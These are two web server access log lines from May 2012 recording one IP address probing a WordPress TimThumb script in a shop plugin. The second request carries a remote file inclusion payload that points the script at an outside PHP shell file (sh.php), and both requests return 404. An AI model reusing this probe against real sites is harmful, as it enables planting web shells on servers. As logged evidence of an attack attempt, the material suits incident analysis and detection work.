216.70.71.78 - - [14/May/2012:09:51:37 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src= HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:09:51:37 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
